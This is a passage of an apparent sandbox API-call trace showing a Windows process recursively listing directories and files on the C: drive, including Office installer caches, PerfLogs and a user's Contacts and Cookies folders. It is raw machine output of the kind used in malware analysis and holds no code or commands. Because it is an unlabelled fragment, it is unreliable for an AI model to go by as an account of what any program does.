ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0184.073] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.073] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0184.073] FindClose (in: hFindFile=0x6eeab0 | out: hFindFile=0x6eeab0) returned 1 [0184.073] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0184.073] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0184.073] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.073] lstrlenW (lpString="{91140000-0011-0000-1000-0000000FF1CE}-C") returned 40 [0184.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6eeab0 [0184.123] FindNextFileW (in: hFindFile=0x6eeab0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.153] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.153] FindNextFileW (in: hFindFile=0x6eeab0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0184.154] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.154] lstrlenW (lpString="Office32WW.msi") returned 14 [0184.154] FindClose (in: hFindFile=0x6eeab0 | out: hFindFile=0x6eeab0) returned 1 [0184.155] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0184.155] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0184.155] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.155] lstrlenW (lpString="{91140000-003B-0000-1000-0000000FF1CE}-C") returned 40 [0184.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0184.232] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.232] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.232] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0184.232] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.232] lstrlenW (lpString="Office32WW.msi") returned 14 [0184.233] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0184.234] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0184.234] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0184.234] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.234] lstrlenW (lpString="{91140000-0057-0000-1000-0000000FF1CE}-C") returned 40 [0184.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0184.324] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.324] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.324] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0184.324] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.324] lstrlenW (lpString="Office32WW.msi") returned 14 [0184.324] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0184.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0184.325] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0184.325] FindClose (in: hFindFile=0x6d5a68 | out: hFindFile=0x6d5a68) returned 1 [0184.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8be8 | out: hHeap=0x6b0000) returned 1 [0184.325] FindNextFileW (in: hFindFile=0x6d5a28, lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0184.326] FindClose (in: hFindFile=0x6d5a28 | out: hFindFile=0x6d5a28) returned 1 [0184.326] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0184.326] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x75544d62, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0184.326] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.326] lstrlenW (lpString="pagefile.sys") returned 12 [0184.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0184.326] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.326] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.326] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Admin", cAlternateFileName="")) returned 1 [0184.326] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.326] lstrlenW (lpString="Admin") returned 5 [0184.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebce0 [0184.327] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.327] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.327] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0184.327] FindClose (in: hFindFile=0x6ebce0 | out: hFindFile=0x6ebce0) returned 1 [0184.327] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee5c8 | out: hHeap=0x6b0000) returned 1 [0184.327] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Admin", cAlternateFileName="")) returned 0 [0184.327] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0184.327] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0184.327] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xeb974700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeb974700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x75544d62, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0184.327] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.327] lstrlenW (lpString="Program Files") returned 13 [0184.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0184.328] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.328] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.328] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0184.328] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.328] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz") returned 20 [0184.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebce0 [0184.328] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.328] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.328] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0184.328] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.329] lstrlenW (lpString="AppData") returned 7 [0184.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x6ef580, ftCreationTime.dwLowDateTime=0x6d5a28, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0184.329] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.329] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0184.329] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.329] lstrlenW (lpString="Contacts") returned 8 [0184.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.329] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.329] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.329] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0184.329] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.330] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0184.330] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.330] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.330] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0184.330] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.330] lstrlenW (lpString="Cookies") returned 7 [0184.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x6ef580, ftCreationTime.dwLowDateTime=0x6e8d08, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0184.330] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, 